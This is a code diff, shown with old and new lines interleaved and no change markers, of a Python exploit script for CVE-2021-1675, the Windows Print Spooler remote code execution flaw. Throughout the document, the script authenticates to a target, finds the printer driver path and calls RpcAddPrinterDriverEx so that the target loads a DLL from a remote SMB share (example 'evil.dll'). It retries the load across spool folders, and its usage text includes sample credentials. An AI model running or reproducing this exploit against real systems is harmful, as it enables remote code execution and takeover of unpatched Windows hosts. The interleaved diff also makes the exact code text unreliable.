@ -5,7 +5,6 @@ from impacket.dcerpc.v5.dtypes import NULL
from impacket . structure import Structure
from impacket . structure import Structure
import argparse
import argparse
import sys
import sys
import time
import pathlib
import pathlib
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030
@ -67,23 +66,7 @@ def getDrivers(dce, handle=NULL):
return blob
return blob
def main ( username , password , domain , lmhash , nthash , address , port , share ) :
def main ( dce , pDriverPath , share ) :
#connect
dce = connect ( username , password , domain , lmhash , nthash , address , port )
#handle = "\\\\{0}\x00".format(address)
handle = NULL
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
try :
blob = getDrivers ( dce , handle )
pDriverPath = str ( pathlib . PureWindowsPath ( blob [ ' DriverPathArray ' ] ) . parent ) + ' \\ UNIDRV.DLL '
except Exception as e :
print ( ' [-] Failed to enumerate remote pDriverPath ' )
print ( str ( e ) )
sys . exit ( 1 )
print ( " [+] pDriverPath Found {0} " . format ( pDriverPath ) )
#build DRIVER_CONTAINER package
#build DRIVER_CONTAINER package
container_info = rprn . DRIVER_CONTAINER ( )
container_info = rprn . DRIVER_CONTAINER ( )
container_info [ ' Level ' ] = 2
container_info [ ' Level ' ] = 2
@ -93,14 +76,15 @@ def main(username, password, domain, lmhash, nthash, address, port, share):
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pEnvironment ' ] = " Windows x64 \x00 "
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pEnvironment ' ] = " Windows x64 \x00 "
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pDriverPath ' ] = pDriverPath + ' \x00 '
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pDriverPath ' ] = pDriverPath + ' \x00 '
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pDataFile ' ] = " {0} \x00 " . format ( share )
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pDataFile ' ] = " {0} \x00 " . format ( share )
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pConfigFile ' ] = " C: \\ Windows \\ System32 \\ kernelbase .dll\x00 "
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pConfigFile ' ] = " C: \\ Windows \\ System32 \\ winhttp .dll\x00 "
flags = rprn . APD_COPY_ALL_FILES | 0x10 | 0x8000
flags = rprn . APD_COPY_ALL_FILES | 0x10 | 0x8000
filename = share . split ( " \\ " ) [ - 1 ]
filename = share . split ( " \\ " ) [ - 1 ]
print ( " [*] Executing {0} " . format ( share ) )
resp = rprn . hRpcAddPrinterDriverEx ( dce , pName = handle , pDriverContainer = container_info , dwFileCopyFlags = flags )
resp = rprn . hRpcAddPrinterDriverEx ( dce , pName = handle , pDriverContainer = container_info , dwFileCopyFlags = flags )
print ( " [*] Stage0: {0} " . format ( resp [ ' ErrorCode ' ] ) )
print ( " [*] Stage0: {0} " . format ( resp [ ' ErrorCode ' ] ) )
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pConfigFile ' ] = " C: \\ Windows \\ System32 \\ kernelbase.dll \x00 "
for i in range ( 1 , 30 ) :
for i in range ( 1 , 30 ) :
try :
try :
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pConfigFile ' ] = " C: \\ Windows \\ System32 \\ spool \\ drivers \\ x64 \\ 3 \\ old \\ {0} \\ {1} \x00 " . format ( i , filename )
container_info [ ' DriverInfo ' ] [ ' Level2 ' ] [ ' pConfigFile ' ] = " C: \\ Windows \\ System32 \\ spool \\ drivers \\ x64 \\ 3 \\ old \\ {0} \\ {1} \x00 " . format ( i , filename )
@ -118,9 +102,11 @@ if __name__ == '__main__':
parser = argparse . ArgumentParser ( add_help = True , description = " CVE-2021-1675 implementation. " , formatter_class = argparse . RawDescriptionHelpFormatter , epilog = """
parser = argparse . ArgumentParser ( add_help = True , description = " CVE-2021-1675 implementation. " , formatter_class = argparse . RawDescriptionHelpFormatter , epilog = """
Example ;
Example ;
. / CVE - 2021 - 1675. py hackit . local / domain_user : Pass123 @ 192.168 .1 .10 ' \\ \\ 192.168.1.215 \\ smb \\ addCube.dll '
. / CVE - 2021 - 1675. py hackit . local / domain_user : Pass123 @ 192.168 .1 .10 ' \\ \\ 192.168.1.215 \\ smb \\ addCube.dll '
. / CVE - 2021 - 1675. py hackit . local / domain_user : Pass123 @ 192.168 .1 .10 ' \\ \\ 192.168.1.215 \ smb \\ addCube.dll ' ' C: \\ Windows \\ System32 \\ DriverStore \\ FileRepository \\ ntprint.inf_amd64_83aa9aebf5dffc96 \\ Amd64 \\ UNIDRV.DLL '
""" )
""" )
parser . add_argument ( ' target ' , action = ' store ' , help = ' [[domain/]username[:password]@]<targetName or address> ' )
parser . add_argument ( ' target ' , action = ' store ' , help = ' [[domain/]username[:password]@]<targetName or address> ' )
parser . add_argument ( ' share ' , action = ' store ' , help = ' Path to DLL. Example \' \\ \\ 10.10.10.10 \\ share \\ evil.dll \' ' )
parser . add_argument ( ' share ' , action = ' store ' , help = ' Path to DLL. Example \' \\ \\ 10.10.10.10 \\ share \\ evil.dll \' ' )
parser . add_argument ( ' pDriverPath ' , action = ' store ' , help = ' Driver path. Example \' C: \\ Windows \\ System32 \\ DriverStore \\ FileRepository \\ ntprint.inf_amd64_83aa9aebf5dffc96 \\ Amd64 \\ UNIDRV.DLL \' ' , nargs = " ? " )
group = parser . add_argument_group ( ' authentication ' )
group = parser . add_argument_group ( ' authentication ' )
group . add_argument ( ' -hashes ' , action = " store " , metavar = " LMHASH:NTHASH " , help = ' NTLM hashes, format is LMHASH:NTHASH ' )
group . add_argument ( ' -hashes ' , action = " store " , metavar = " LMHASH:NTHASH " , help = ' NTLM hashes, format is LMHASH:NTHASH ' )
group = parser . add_argument_group ( ' connection ' )
group = parser . add_argument_group ( ' connection ' )
@ -161,12 +147,34 @@ Example;
lmhash = ' '
lmhash = ' '
nthash = ' '
nthash = ' '
#connect
dce = connect ( username , password , domain , lmhash , nthash , options . target_ip , options . port )
#handle = "\\\\{0}\x00".format(address)
handle = NULL
#find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
if not options . pDriverPath :
try :
blob = getDrivers ( dce , handle )
pDriverPath = str ( pathlib . PureWindowsPath ( blob [ ' DriverPathArray ' ] ) . parent ) + ' \\ UNIDRV.DLL '
if not " filerepository " in pDriverPath :
print ( " [-] pDriverPath {0} , expected : \\ Windows \\ System32 \\ DriverStore \\ FileRepository \\ ..... " . format ( pDriverPath ) )
print ( " [-] Specify pDriverPath manually " )
sys . exit ( 1 )
except Exception as e :
print ( ' [-] Failed to enumerate remote pDriverPath ' )
print ( str ( e ) )
sys . exit ( 1 )
else :
pDriverPath = options . pDriverPath
print ( " [+] pDriverPath Found {0} " . format ( pDriverPath ) )
print ( " [*] Executing {0} " . format ( options . share ) )
#re-run if stage0/stageX fails
#re-run if stage0/stageX fails
print ( " [*] Try 1... " )
print ( " [*] Try 1... " )
main ( username , password , domain , lmhash , nthash , options . target_ip , options . port , options . share )
main ( dce , pDriverPath , options . share )
time . sleep ( 10 )
print ( " [*] Try 2... " )
print ( " [*] Try 2... " )
main ( username , password , domain , lmhash , nthash , options . target_ip , options . port , options . share )
main ( dce , pDriverPath , options . share )
time . sleep ( 10 )
print ( " [*] Try 3... " )
print ( " [*] Try 3... " )
main ( username , password , domain , lmhash , nthash , options . target_ip , options . port , options . share )
main ( dce , pDriverPath , options . share )